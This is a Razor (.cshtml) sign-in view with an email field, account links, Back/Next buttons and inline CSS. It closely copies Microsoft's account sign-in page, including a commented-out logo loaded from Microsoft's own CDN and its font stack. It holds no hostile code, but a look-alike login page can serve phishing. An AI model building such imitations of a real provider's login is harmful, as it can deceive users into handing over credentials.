@page "/sign-in"
@model SignInViewModel

@{
    ViewData["Title"] = "Sign in";
}
@* 
<div>
    <img 
        class="logo" 
        role="img"
        src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg">
</div>

<div role="main">

</div>

<div>
    <div>
        <img src="https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg">
    </div>
    <div>
        <div>Sign-in options</div>
    </div>
</div> *@

<div>Sign in</div>

<input asp-for="EmailAddress" type="email" autocomplete="username" spellcheck="false" placeholder="Email address">

<div>No account? <a>Create one!</a></div>
<a>Can't access your account?</a>

<div>
    <button>Back</button>
    <button>Next</button>
</div>

<div>Sign-in options</div>

<style>
* {
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}

body {
    margin: 0;
    font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
    font-size: 15px;
    line-height: 20px;
    font-weight: 400;
    font-size: .9375rem;
    line-height: 1.25rem;
    padding-bottom: .227px;
    padding-top: .227px;
    color: #000;
    background-color: #fff;
    direction: ltr;
    display: block;
}

body.cb {
    color: #1b1b1b;
    text-align: left;
}

img {
    border: 0;
    vertical-align: middle;
}

.logo {
    max-width: 256px;
    height: 24px;
}
</style>